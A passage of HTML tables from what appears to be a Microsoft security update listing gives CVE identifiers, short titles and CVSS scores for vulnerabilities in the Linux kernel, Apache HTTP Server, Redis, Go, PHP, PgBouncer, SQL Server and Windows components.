href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43258">CVE-2026-43258</a></td><td><p>alpha: fix user-space corruption during memory compaction</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-71289">CVE-2025-71289</a></td><td><p>fs/ntfs3: handle attr_set_size() errors when truncating files</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43107">CVE-2026-43107</a></td><td><p>xfrm: account XFRMA_IF_ID in aevent size calculation</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43243">CVE-2026-43243</a></td><td><p>drm/amd/display: Add signal type check for dcn401 get_phyd32clk_src</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-71294">CVE-2025-71294</a></td><td><p>drm/amdgpu: fix NULL pointer issue buffer funcs</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43250">CVE-2026-43250</a></td><td><p>usb: chipidea: udc: fix DMA and SG cleanup in _ep_nuke()</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43237">CVE-2026-43237</a></td><td><p>drm/amdgpu: Refactor amdgpu_gem_va_ioctl for Handling Last Fence Update and Timeline Management v4</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43201">CVE-2026-43201</a></td><td><p>APEI/GHES: ARM processor Error: don't go past allocated memory</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43219">CVE-2026-43219</a></td><td><p>net: cpsw_new: Fix potential unregister of netdev that has not been registered yet</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43165">CVE-2026-43165</a></td><td><p>hwmon: (nct7363) Fix a resource leak in nct7363_present_pwm_fanin</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43088">CVE-2026-43088</a></td><td><p>net: af_key: zero aligned sockaddr tail in PF_KEY exports</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43195">CVE-2026-43195</a></td><td><p>drm/amdgpu: validate user queue size constraints</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-71272">CVE-2025-71272</a></td><td><p>most: core: fix resource leak in most_register_interface error paths</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43213">CVE-2026-43213</a></td><td><p>wifi: rtw89: pci: validate sequence number of TX release report</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43228">CVE-2026-43228</a></td><td><p>hfs: Replace BUG_ON with error handling for CNID count checks</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43216">CVE-2026-43216</a></td><td><p>net: Drop the lock in skb_may_tx_timestamp()</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43119">CVE-2026-43119</a></td><td><p>Bluetooth: hci_sync: annotate data-races around hdev-&gt;req_status</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43267">CVE-2026-43267</a></td><td><p>wifi: rtw89: fix potential zero beacon interval in beacon tracking</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43101">CVE-2026-43101</a></td><td><p>ipv6: ioam: fix potential NULL dereferences in __ioam6_fill_trace_data()</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43199">CVE-2026-43199</a></td><td><p>net/mlx5e: Fix "scheduling while atomic" in IPsec MAC address query</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43083">CVE-2026-43083</a></td><td><p>net: ioam6: fix OOB and missing lock</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43870">CVE-2026-43870</a></td><td><p>Apache Thrift: Node.js web_server.js multi-vulnerability</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43868">CVE-2026-43868</a></td><td><p>Apache Thrift: Rust implementation vulnerable to CVE-2020-13949 pattern</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-33523">CVE-2026-33523</a></td><td><p>Apache HTTP Server: multiple modules: HTTP response splitting forwarding malicious status line</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-23918">CVE-2026-23918</a></td><td><p>Apache HTTP Server: http2: double free and possible RCE on early reset</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34059">CVE-2026-34059</a></td><td><p>Apache HTTP Server: mod_proxy_ajp: Heap Over-Read and memory disclosure in ajp_parse_data()</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34032">CVE-2026-34032</a></td><td><p>Apache HTTP Server: mod_proxy_ajp: Heap Buffer Over-Read Due to Missing Null-Termination Check (ajp_msg_get_string)</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-24072">CVE-2026-24072</a></td><td><p>Apache HTTP Server: mod_rewrite elevation of privileges via ap_expr</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-33006">CVE-2026-33006</a></td><td><p>Apache HTTP Server: mod_auth_digest timing attack</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>4.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-33007">CVE-2026-33007</a></td><td><p>Apache HTTP Server: mod_authn_socache crash</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-29169">CVE-2026-29169</a></td><td><p>Apache HTTP Server: mod_dav_lock indirect lock crash</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-29168">CVE-2026-29168</a></td><td><p>Apache HTTP Server: mod_md unrestricted OCSP response</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-33857">CVE-2026-33857</a></td><td><p>Apache HTTP Server: Off-by-one OOB reads in AJP getter functions</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-41672">CVE-2026-41672</a></td><td><p>xmldom: XML node injection through unvalidated comment serialization</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-41674">CVE-2026-41674</a></td><td><p>xmldom: XML injection through unvalidated DocumentType serialization</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-41675">CVE-2026-41675</a></td><td><p>xmldom: XML node injection through unvalidated processing instruction serialization</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-41673">CVE-2026-41673</a></td><td><p>xmldom: Denial of service via uncontrolled recursion in XML serialization</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-25243">CVE-2026-25243</a></td><td><p>redis-server RESTORE invalid memory access may allow remote code execution</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-23631">CVE-2026-23631</a></td><td><p>redis-server Lua use-after-free may allow remote code execution</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-31717">CVE-2026-31717</a></td><td><p>ksmbd: validate owner of durable handle on reconnect</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-31718">CVE-2026-31718</a></td><td><p>ksmbd: fix use-after-free in __ksmbd_close_fd() via durable scavenger</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>9.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-23479">CVE-2026-23479</a></td><td><p>redis-server use-after-free in unblock client flow may allow remote code execution</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-25588">CVE-2026-25588</a></td><td><p>RedisTimeSeries RESTORE invalid memory access may allow remote code execution</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-25589">CVE-2026-25589</a></td><td><p>RedisBloom RESTORE invalid memory access may allow remote code execution</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43474">CVE-2026-43474</a></td><td><p>fs: init flags_valid before calling vfs_fileattr_get</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43338">CVE-2026-43338</a></td><td><p>btrfs: reserve enough transaction items for qgroup ioctls</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-71302">CVE-2025-71302</a></td><td><p>drm/panthor: fix for dma-fence safe access rules</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43318">CVE-2026-43318</a></td><td><p>drm/amdgpu: fix sync handling in amdgpu_dma_buf_move_notify</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43309">CVE-2026-43309</a></td><td><p>md raid: fix hang when stopping arrays with metadata through dm-raid</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43416">CVE-2026-43416</a></td><td><p>powerpc, perf: Check that current-&gt;mm is alive before getting user callchain</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-71299">CVE-2025-71299</a></td><td><p>spi: cadence-quadspi: Parse DT for flashes with the rest of the DT parsing</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43284">CVE-2026-43284</a></td><td><p>xfrm: esp: avoid in-place decrypt on shared skb frags</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43352">CVE-2026-43352</a></td><td><p>i3c: mipi-i3c-hci: Correct RING_CTRL_ABORT handling in DMA dequeue</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43300">CVE-2026-43300</a></td><td><p>drm/panel: Fix a possible null-pointer dereference in jdi_panel_dsi_remove()</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43331">CVE-2026-43331</a></td><td><p>x86/kexec: Disable KCOV instrumentation after load_segments()</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43320">CVE-2026-43320</a></td><td><p>drm/amd/display: Fix dsc eDP issue</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43306">CVE-2026-43306</a></td><td><p>bpf: crypto: Use the correct destructor kfunc type</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43443">CVE-2026-43443</a></td><td><p>ASoC: amd: acp-mach-common: Add missing error check for clock acquisition</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43317">CVE-2026-43317</a></td><td><p>most: core: fix leak on early registration failure</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43319">CVE-2026-43319</a></td><td><p>spi: spidev: fix lock inversion between spi_lock and buf_lock</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43303">CVE-2026-43303</a></td><td><p>mm/page_alloc: clear page-&gt;private in free_pages_prepare()</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43344">CVE-2026-43344</a></td><td><p>perf/x86/intel/uncore: Fix die ID init and look up bugs</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43321">CVE-2026-43321</a></td><td><p>bpf: Properly mark live registers for indirect jumps</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43456">CVE-2026-43456</a></td><td><p>bonding: fix type confusion in bond_setup_by_slave()</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43305">CVE-2026-43305</a></td><td><p>drm/amd/display: Fix mismatched unlock for DMUB HW lock in HWSS fast path</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43298">CVE-2026-43298</a></td><td><p>drm/amdgpu: Skip vcn poison irq release on VF</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43299">CVE-2026-43299</a></td><td><p>btrfs: do not ASSERT() when the fs flips RO inside btrfs_repair_io_failure()</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43400">CVE-2026-43400</a></td><td><p>drm/amdgpu: add upper bound check on user inputs in signal ioctl</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43310">CVE-2026-43310</a></td><td><p>media: verisilicon: Avoid G2 bus error while decoding H.264 and HEVC</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43294">CVE-2026-43294</a></td><td><p>drm: renesas: rz-du: mipi_dsi: fix kernel panic when rebooting for some panels</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43353">CVE-2026-43353</a></td><td><p>i3c: mipi-i3c-hci: Fix race in DMA ring dequeue</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43292">CVE-2026-43292</a></td><td><p>mm/vmalloc: prevent RCU stalls in kasan_release_vmalloc_node</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43398">CVE-2026-43398</a></td><td><p>drm/amdgpu: add upper bound check on user inputs in wait ioctl</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43311">CVE-2026-43311</a></td><td><p>soc/tegra: pmc: Fix unsafe generic_handle_irq() call</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43421">CVE-2026-43421</a></td><td><p>usb: gadget: f_ncm: Fix net_device lifecycle with device_move</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43308">CVE-2026-43308</a></td><td><p>btrfs: don't BUG() on unexpected delayed ref type in run_one_delayed_ref()</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-37458">CVE-2026-37458</a></td><td><p></p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-37459">CVE-2026-37459</a></td><td><p></p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-33846">CVE-2026-33846</a></td><td><p>Gnutls: gnutls: denial of service via heap buffer overflow in dtls handshake fragment reassembly</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-6664">CVE-2026-6664</a></td><td><p>PgBouncer integer overflow in PgBouncer network packet parsing</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-6665">CVE-2026-6665</a></td><td><p>PgBouncer buffer overflow in SCRAM</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>8.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-6667">CVE-2026-6667</a></td><td><p>PgBouncer missing authorization check in KILL_CLIENT admin command</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>4.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-6666">CVE-2026-6666</a></td><td><p>PgBouncer crash in kill_pool_logins_server_error</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.9</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-45130">CVE-2026-45130</a></td><td><p>Vim: Heap Buffer Overflow in spell file loading</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>6.6</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-44656">CVE-2026-44656</a></td><td><p>Vim: OS Command Injection via 'path' completion</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-33811">CVE-2026-33811</a></td><td><p>Crash when handling long CNAME response in net</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-33814">CVE-2026-33814</a></td><td><p>Infinite loop in HTTP/2 transport when given bad SETTINGS_MAX_FRAME_SIZE in net/http/internal/http2 in golang.org/x/net</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-39817">CVE-2026-39817</a></td><td><p>Invoking "go tool pack" does not sanitize output paths in cmd/go</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.9</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-39819">CVE-2026-39819</a></td><td><p>Invoking "go bug" follows symlinks in predictable temporary filenames in cmd/go</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-39820">CVE-2026-39820</a></td><td><p>Quadratic string concatentation in consumeComment in net/mail</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-39823">CVE-2026-39823</a></td><td><p>Bypass of meta content URL escaping causes XSS in html/template</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>6.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-39825">CVE-2026-39825</a></td><td><p>ReverseProxy forwards queries with more than urlmaxqueryparams parameters in net/http/httputil</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-39826">CVE-2026-39826</a></td><td><p>Escaper bypass leads to XSS in html/template</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>6.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-39836">CVE-2026-39836</a></td><td><p>Panic in Dial and LookupPort when handling NUL byte on Windows in net</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-42499">CVE-2026-42499</a></td><td><p>Quadratic string concatenation in consumePhrase in net/mail</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-42501">CVE-2026-42501</a></td><td><p>Malicious module proxy can bypass checksum database in cmd/go</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-33079">CVE-2026-33079</a></td><td><p>Mistune ReDoS in LINK_TITLE_RE allows denial of service with crafted Markdown titles</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-41889">CVE-2026-41889</a></td><td><p>pgx: SQL Injection via placeholder confusion with dollar quoted string literals</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-42257">CVE-2026-42257</a></td><td><p>net-imap: Command Injection via "raw" arguments to multiple commands</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-42258">CVE-2026-42258</a></td><td><p>net-imap: Command Injection via unvalidated Symbol inputs</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-42256">CVE-2026-42256</a></td><td><p>net-imap: Denial of service via high iteration count for `SCRAM-*` authentication</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-42246">CVE-2026-42246</a></td><td><p>net-imap vulnerable to STARTTLS stripping via invalid response timing</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-45186">CVE-2026-45186</a></td><td><p></p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>2.9</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7261">CVE-2026-7261</a></td><td><p>SoapServer session-persisted object use-after-free via SOAP header fault</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7258">CVE-2026-7258</a></td><td><p>Out-of-bounds read in urldecode() on NetBSD</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-6722">CVE-2026-6722</a></td><td><p>Use-After-Free in SOAP using Apache map</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-6735">CVE-2026-6735</a></td><td><p>XSS within PHP-FPM status endpoint</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7262">CVE-2026-7262</a></td><td><p>NULL pointer dereference in SOAP apache:Map decoder with missing &lt;value&gt;</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-14179">CVE-2025-14179</a></td><td><p>SQL injection in pdo_firebird via NUL bytes in quoted strings</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7568">CVE-2026-7568</a></td><td><p>Signed integer overflow in metaphone()</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7259">CVE-2026-7259</a></td><td><p>Null pointer dereference in php_mb_check_encoding() via mb_ereg_search_init()</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43500">CVE-2026-43500</a></td><td><p>rxrpc: Also unshare DATA/RESPONSE packets when paged frags are present</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.8</p></td></tr></tbody></table><p></p><p></p><h3>SQL Server vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploitation status</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSS v3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40370">CVE-2026-40370</a></td><td><p>SQL Server Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>8.8</p></td></tr></tbody></table><h3>Windows vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploitation status</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSS v3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-54518">CVE-2025-54518</a></td><td><p>AMD: CVE-2025-54518 CPU OP Cache Corruption</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-41095">CVE-2026-41095</a></td><td><p>Data Deduplication Elevation of Privilege 